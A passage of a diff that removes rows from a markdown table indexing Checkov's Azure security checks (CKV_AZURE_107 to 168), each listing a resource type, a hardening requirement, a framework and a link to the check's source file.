-| 1820 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) |
-| 1821 | CKV_AZURE_108 
| resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) | -| 1822 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 1823 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 1824 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) | -| 1825 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) | -| 1826 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 1827 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 1828 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key 
vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) | -| 1829 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 1830 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 1831 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) | -| 1832 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 1833 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 1834 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) | -| 1835 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | 
[SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 1836 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 1837 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) | -| 1838 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) | -| 1839 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) | -| 1840 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) | -| 1841 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) | -| 1842 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | 
[AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) | -| 1843 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | -| 1844 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | -| 1845 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 1846 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 1847 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) | -| 1848 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) | -| 1849 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF 
in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 1850 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 1851 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) | -| 1852 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) | -| 1853 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) | -| 1854 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) | -| 1855 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | 
[MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) | -| 1856 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) | -| 1857 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | -| 1858 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 1859 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 1860 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | -| 1861 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | -| 1862 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should 
not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) | -| 1863 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) | -| 1864 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 1865 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 1866 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | -| 1867 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | -| 1868 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 1869 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 1870 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | -| 1871 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | -| 1872 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | -| 1873 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | -| 1874 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | -| 1875 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | -| 1876 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | -| 1877 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | -| 1878 | CKV_AZURE_142 | resource | 
azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | -| 1879 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | -| 1880 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | -| 1881 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1882 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1883 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1884 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | 
[FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1885 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1886 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1887 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | -| 1888 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | -| 1889 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | -| 1890 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 1891 | 
CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 1892 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 1893 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 1894 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 1895 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 1896 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | -| 1897 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | 
[WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 1898 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 1899 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | -| 1900 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | -| 1901 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1902 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1903 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1904 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption 
| Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) |
-| 1905 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) |
-| 1906 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) |
-| 1907 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) |
-| 1908 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure that databricks workspace is not public | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) |
-| 1909 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) |
-| 1910 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) |
-| 1911 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
-| 1912 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
-| 1913 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
-| 1914 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
-| 1915 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) |
-| 1916 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) |
-| 1917 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) |
-| 1918 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) |
-| 1919 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) |
-| 1920 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) |
-| 1921 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) |
-| 1922 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) |
-| 1923 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) |
-| 1924 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) |
